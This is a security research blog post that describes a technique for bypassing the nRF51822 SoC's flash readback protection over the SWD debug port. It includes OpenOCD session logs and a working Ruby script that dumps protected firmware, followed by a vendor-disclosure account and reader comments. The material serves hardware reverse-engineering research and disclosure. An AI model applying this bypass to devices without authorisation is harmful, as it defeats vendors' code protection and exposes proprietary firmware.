Thursday, November 5, 2015

Firmware dumping technique for an ARM Cortex-M0 SoC

by Kris Brosch

One of the first major goals when reversing a new piece of hardware is getting a copy of the firmware. Once you have access to the firmware, you can reverse engineer it by disassembling the machine code.

Sometimes you can get access to the firmware without touching the hardware, by downloading a firmware update file for example. More often, you need to interact with the chip where the firmware is stored. If the chip has a debug port that is accessible, it may allow you to read the firmware through that interface. However, most modern chips have security features that when enabled, prevent firmware from being read through the debugging interface. In these situations, you may have to resort to decapping the chip, or introducing glitches into the hardware logic by manipulating inputs such as power or clock sources and leveraging the resulting behavior to successfully bypass these security implementations.

This blog post is a discussion of a new technique that we've created to dump the firmware stored on a particular Bluetooth system-on-chip (SoC), and how we bypassed that chip's security features to do so by only using the debugging interface of the chip. We believe this technique is a vulnerability in the code protection features of this SoC and as such have notified the IC vendor prior to publication of this blog post.

The SoC

The SoC in question is a Nordic Semiconductor nRF51822. The nRF51822 is a popular Bluetooth SoC with an ARM Cortex-M0 CPU core and built-in Bluetooth hardware. The chip's manual is available here.

Chip security features that prevent code readout vary in implementation among the many microcontrollers and SoCs available from various manufacturers, even among those that use the same ARM cores. The nRF51822's code protection allows the developer to prevent the debugging interface from being able to read either all of code and memory (flash and RAM) sections, or a just a subsection of these areas. Additionally, some chips have options to prevent debugger access entirely. The nRF51822 doesn't provide such a feature to developers; it just disables memory accesses through the debugging interface.

The nRF51822 has a serial wire debug (SWD) interface, a two-wire (in addition to ground) debugging interface available on many ARM chips. Many readers may be familiar with JTAG as a physical interface that often provides access to hardware and software debugging features of chips. Some ARM cores support a debugging protocol that works over the JTAG physical interface; SWD is a different physical interface that can be used to access the same software debugging features of a chip that ARM JTAG does. OpenOCD is an open source tool that can be used to access the SWD port.

This document contains a pinout diagram of the nRF51822. Luckily the hardware target we were analyzing has test points connected to the SWDIO and SWDCLK chip pins with PCB traces that were easy to follow. By connecting to these test points with a SWD adapter, we can use OpenOCD to access the chip via SWD. There are many debug adapters supported by OpenOCD, some of which support SWD.

Exploring the Debugger Access

Once OpenOCD is connected to the target, we can run debugging commands, and read/write some ARM registers, however we are prevented from reading out the code section. In the example below, we connect to the target with OpenOCD and attempt to read memory sections from the target chip. We proceed to reset the processor and read from the address 0x00000000 and the address that we determine is in the program counter (pc) register (0x000114cc), however nothing but zeros is returned. Of course we know there is code there, but the code protection counter-measures are preventing us from accessing it:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> mdw 0x00000000
0x00000000: 00000000
> mdw 0x000114cc 10
0x000114cc: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
0x000114ec: 00000000 00000000

We can however read and write CPU registers, including the program counter (pc), and we can single-step through instructions (we just don't know what instructions, since we can't read them):

> reg r0 0x12345678
r0 (/32): 0x12345678
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg pc 0x00011500
pc (/32): 0x00011500
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x00011502 msp: 0x20001bd0


We can also read a few of the memory-mapped configuration registers. Here we are reading a register named "RBPCONF" (short for readback protection) in a collection of registers named "UICR" (User Information Configuration Registers); you can find the address of this register in the nRF51 Series Reference Manual:

> mdw 0x10001004
0x10001004: ffff00ff


According to the manual, a value of 0xffff00ff in the RBPCONF register means "Protect all" (PALL) is enabled (bits 15..8, labeled "B" in this table, are set to 0), and "Protect region 0" (PR0) is disabled (bits 7..0, labeled "A", are set to1):


The PALL feature being enabled is what is responsible for preventing us from accessing the code section and subsequently causing our read commands to return zeros.

The other protection feature, PR0, is not enabled in this case, but it's worth mentioning because the protection bypass discussed in this article could bypass PR0 as well. If enabled, it would prevent the debugger from reading memory below a configurable address. Note that flash (and therefore the firmware we want) exists at a lower address than RAM. PR0 also prevents code running outside of the protected region from reading any data within the protected region.

Unfortunately, it is not possible to disable PALL without erasing the entire chip, wiping away the firmware with it. However, it is possible to bypass this readback protection by leveraging our debug access to the CPU.

Devising a Protection Bypass

An initial plan to dump the firmware via a debugging interface might be to load some code into RAM that reads the firmware from flash into a RAM buffer that we could then read. However, we don't have access to RAM because PALL is enabled. Even if PALL were disabled, PR0 could have been enabled, which would prevent our code in RAM (which would be the unprotected region) from reading flash (in the protected region). This plan won't work if either PALL or PR0 is enabled.

To bypass the memory protections, we need a way to read the protected data and we need a place to write it that we can access. In this case, only code that exists in protected memory can read protected memory. So our method of reading data will be to jump to an instruction in protected memory using our debugger access, and then to execute that instruction. The instruction will read the protected data into a CPU register, at which time we can then read the value out of the CPU register using our debugger access. How do we know what instruction to jump to? We'll have to blindly search protected memory for a load instruction that will read from an address we supply in a register. Once we've found such an instruction, we can exploit it to read out all of the firmware.

Finding a Load Instruction

Our debugger access lets us write to the pc register in order to jump to any instruction, and it lets us single step the instruction execution. We can also read and write the contents of the general purpose CPU registers. In order to read from the protected memory, we have to find a load word instruction with a register operand, set the operand register to a target address, and execute that one instruction. Since we can't read the flash, we don't know what instructions are where, so it might seem difficult to find the right instruction. However, all we need is an instruction that reads memory from an address in some register to a register, which is a pretty common operation. A load word instruction would work, or a pop instruction, for example.

We can search for the right instruction using trial and error. First, we set the program counter to somewhere we guess a useful instruction might be. Then, we set all the CPU registers to an address we're interested in and then single step. Next we examine the registers. If we are lucky, the instruction we just executed loaded data from an address stored in another register. If one of the registers has changed to a value that might exist at the target address, then we may have found a useful load instruction.

We might as well start at the reset vector - at least we know there are valid instructions there. Here we're resetting the CPU, setting the general purpose registers and stack pointer to zero (the address we're trying), and single stepping, then examining the registers:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> reg r0 0x00000000
r0 (/32): 0x00000000
> reg r1 0x00000000
r1 (/32): 0x00000000
> reg r2 0x00000000
r2 (/32): 0x00000000
> reg r3 0x00000000
r3 (/32): 0x00000000
> reg r4 0x00000000
r4 (/32): 0x00000000
> reg r5 0x00000000
r5 (/32): 0x00000000
> reg r6 0x00000000
r6 (/32): 0x00000000
> reg r7 0x00000000
r7 (/32): 0x00000000
> reg r8 0x00000000
r8 (/32): 0x00000000
> reg r9 0x00000000
r9 (/32): 0x00000000
> reg r10 0x00000000
r10 (/32): 0x00000000
> reg r11 0x00000000
r11 (/32): 0x00000000
> reg r12 0x00000000
r12 (/32): 0x00000000
> reg sp 0x00000000
sp (/32): 0x00000000
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 00000000
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x10001014
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x00000000
(6) r6 (/32): 0x00000000
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x00000000
(9) r9 (/32): 0x00000000
(10) r10 (/32): 0x00000000
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000000
(13) sp (/32): 0x00000000
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114CE
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000000
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

Looks like r3 was set to 0x10001014. Is that the value at address zero? Let's see what happens when we load the registers with four instead:
> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> reg r0 0x00000004
r0 (/32): 0x00000004
> reg r1 0x00000004
r1 (/32): 0x00000004
> reg r2 0x00000004
r2 (/32): 0x00000004
> reg r3 0x00000004
r3 (/32): 0x00000004
> reg r4 0x00000004
r4 (/32): 0x00000004
> reg r5 0x00000004
r5 (/32): 0x00000004
> reg r6 0x00000004
r6 (/32): 0x00000004
> reg r7 0x00000004
r7 (/32): 0x00000004
> reg r8 0x00000004
r8 (/32): 0x00000004
> reg r9 0x00000004
r9 (/32): 0x00000004
> reg r10 0x00000004
r10 (/32): 0x00000004
> reg r11 0x00000004
r11 (/32): 0x00000004
> reg r12 0x00000004
r12 (/32): 0x00000004
> reg sp 0x00000004
sp (/32): 0x00000004
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x00000004
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000004
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x00000004
(3) r3 (/32): 0x10001014
(4) r4 (/32): 0x00000004
(5) r5 (/32): 0x00000004
(6) r6 (/32): 0x00000004
(7) r7 (/32): 0x00000004
(8) r8 (/32): 0x00000004
(9) r9 (/32): 0x00000004
(10) r10 (/32): 0x00000004
(11) r11 (/32): 0x00000004
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x00000004
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114CE
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000004
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

Nope, r3 gets the same value, so we're not interested in the first instruction. Let's continue on to the second:

> reg r0 0x00000000
r0 (/32): 0x00000000
> reg r1 0x00000000
r1 (/32): 0x00000000
> reg r2 0x00000000
r2 (/32): 0x00000000
> reg r3 0x00000000
r3 (/32): 0x00000000
> reg r4 0x00000000
r4 (/32): 0x00000000
> reg r5 0x00000000
r5 (/32): 0x00000000
> reg r6 0x00000000
r6 (/32): 0x00000000
> reg r7 0x00000000
r7 (/32): 0x00000000
> reg r8 0x00000000
r8 (/32): 0x00000000
> reg r9 0x00000000
r9 (/32): 0x00000000
> reg r10 0x00000000
r10 (/32): 0x00000000
> reg r11 0x00000000
r11 (/32): 0x00000000
> reg r12 0x00000000
r12 (/32): 0x00000000
> reg sp 0x00000000
sp (/32): 0x00000000
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 00000000
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x20001BD0
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x00000000
(6) r6 (/32): 0x00000000
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x00000000
(9) r9 (/32): 0x00000000
(10) r10 (/32): 0x00000000
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000000
(13) sp (/32): 0x00000000
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114D0
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000000
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

OK, this time r3 was set to 0x20001BD0. Is that the value at address zero? Let's see what happens when we run the second instruction with the registers set to 4:
> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg r0 0x00000004
r0 (/32): 0x00000004
> reg r1 0x00000004
r1 (/32): 0x00000004
> reg r2 0x00000004
r2 (/32): 0x00000004
> reg r3 0x00000004
r3 (/32): 0x00000004
> reg r4 0x00000004
r4 (/32): 0x00000004
> reg r5 0x00000004
r5 (/32): 0x00000004
> reg r6 0x00000004
r6 (/32): 0x00000004
> reg r7 0x00000004
r7 (/32): 0x00000004
> reg r8 0x00000004
r8 (/32): 0x00000004
> reg r9 0x00000004
r9 (/32): 0x00000004
> reg r10 0x00000004
r10 (/32): 0x00000004
> reg r11 0x00000004
r11 (/32): 0x00000004
> reg r12 0x00000004
r12 (/32): 0x00000004
> reg sp 0x00000004
sp (/32): 0x00000004
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x00000004
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000004
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x00000004
(3) r3 (/32): 0x000114CD
(4) r4 (/32): 0x00000004
(5) r5 (/32): 0x00000004
(6) r6 (/32): 0x00000004
(7) r7 (/32): 0x00000004
(8) r8 (/32): 0x00000004
(9) r9 (/32): 0x00000004
(10) r10 (/32): 0x00000004
(11) r11 (/32): 0x00000004
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x00000004
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114D0
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000004
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

This time, r3 got 0x00014CD. This value actually strongly implies we're reading memory. Why? The value is actually the reset vector. According to the Cortex-M0 documentation, the reset vector is at address 4, and when we reset the chip, the PC is set to 0x000114CC (the least significant bit is set in the reset vector, changing C to D, because the Cortex-M0 operates in Thumb mode).

Let's try reading the two instructions we just were testing:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg r0 0x000114cc
r0 (/32): 0x000114CC
> reg r1 0x000114cc
r1 (/32): 0x000114CC
> reg r2 0x000114cc
r2 (/32): 0x000114CC
> reg r3 0x000114cc
r3 (/32): 0x000114CC
> reg r4 0x000114cc
r4 (/32): 0x000114CC
> reg r5 0x000114cc
r5 (/32): 0x000114CC
> reg r6 0x000114cc
r6 (/32): 0x000114CC
> reg r7 0x000114cc
r7 (/32): 0x000114CC
> reg r8 0x000114cc
r8 (/32): 0x000114CC
> reg r9 0x000114cc
r9 (/32): 0x000114CC
> reg r10 0x000114cc
r10 (/32): 0x000114CC
> reg r11 0x000114cc
r11 (/32): 0x000114CC
> reg r12 0x000114cc
r12 (/32): 0x000114CC
> reg sp 0x000114cc
sp (/32): 0x000114CC
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x000114cc
> reg r3
r3 (/32): 0x681B4B13

The r3 register has the value 0x681B4B13. That disassembles to two load instructions, the first relative to the pc, the second relative to r3:

$ printf "\x13\x4b\x1b\x68" > /tmp/armcode
$ arm-none-eabi-objdump -D --target binary -Mforce-thumb -marm /tmp/armcode

/tmp/armcode:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:   4b13            ldr     r3, [pc, #76]   ; (0x50)
   2:   681b            ldr     r3, [r3, #0]

In case you don't read Thumb assembly, that second instruction is a load register instruction (ldr); it's taking an address from the r3 register, adding an offset of zero, and loading the value from that address into the r3 register.

We've found a load instruction that lets us read memory from an arbitrary address. Again, this is useful because only code in the protected memory can read the protected memory. The trick is that being able to read and write CPU registers using OpenOCD lets us execute those instructions however we want. If we hadn't been lucky enough to find the load word instruction so close to the reset vector, we could have reset the processor and written a value to the pc register (jumping to an arbitrary address) to try more instructions. Since we were lucky though, we can just step through the first instruction.

Dumping the Firmware

Now that we've found a load instruction that we can execute to read from arbitrary addresses, our firmware dumping process is as follows:
  1. Reset the CPU
  2. Single step (we don't care about the first instruction)
  3. Put the address we want to read from into r3
  4. Single step (this loads from the address in r3 to r3)
  5. Read the value from r3
Here's a ruby script to automate the process:

#!/usr/bin/env ruby require 'net/telnet' debug = Net::Telnet::new("Host" => "localhost", "Port" => 4444) dumpfile = File.open("dump.bin", "w") ((0x00000000/4)...(0x00040000)/4).each do |i| address = i * 4 debug.cmd("reset halt") debug.cmd("step") debug.cmd("reg r3 0x#{address.to_s 16}") debug.cmd("step") response = debug.cmd("reg r3") value = response.match(/: 0x([0-9a-fA-F]{8})/)[1].to_i 16 dumpfile.write([value].pack("V")) puts "0x%08x: 0x%08x" % [address, value] end dumpfile.close debug.close
The ruby script connects to the OpenOCD user interface, which is available via a telnet connection on localhost. It then loops through addresses that are multiples of four, using the load instruction we found to read data from those addresses.

Vendor Response

IncludeSec contacted NordicSemi via their customer support channel where they received a copy of this blog post. From NordicSemi customer support: "We take this into consideration together with other factors, and the discussions around this must be kept internal."

We additionally reached out to the only engineer who had security in his title and he didn't really want a follow-up Q&A call or further info and redirected us to only talk to customer support. So that's about all we can do for coordinated disclosure on our side.


Conclusion

Once we have a copy of the firmware image, we can do whatever disassembly or reverse engineering we want with it. We can also now disable the chip's PALL protection in order to more easily debug the code. To disable PALL, you need to erase the chip, but that's not a problem since we can immediately re-flash the chip using the dumped firmware. Once that the chip has been erased and re-programmed to disable the protection we can freely use the debugger to: read and write RAM, set breakpoints, and so on. We can even attach GDB to OpenOCD, and debug the firmware that way.

The technique described here won't work on all microcontrollers or SoCs; it only applies to situations where you have access to a debugging interface that can read and write CPU registers but not protected memory. Despite the limitation though, the technique can be used to dump firmware from nRF51822 chips and possibly others that use similar protections. We feel this is a vulnerability in the design of the nRF51822 code protection.

Are you using other cool techniques to dump firmware? Do you know of any other microcontrollers or SoCs that might be vulnerable to this type of code protection bypass? Let us know in the comments.

4 comments :

  1. LOL!! That's awesome - good find!

    ReplyDelete
  2. This is the perfect example of "out of box" thinking. Congratulations and you got a new follower.

    ReplyDelete
  3. Thank you for this article it was fun while it lasted :)
    I have tried to get firmware with your script but at some point it failed :)
    Now I cannot connect to bracelet but I will try with different programmer and with JTAG.
    Here is my tryout ...
    http://www.lemilica.com/hacking-smart-bracelet-wristband/

    ReplyDelete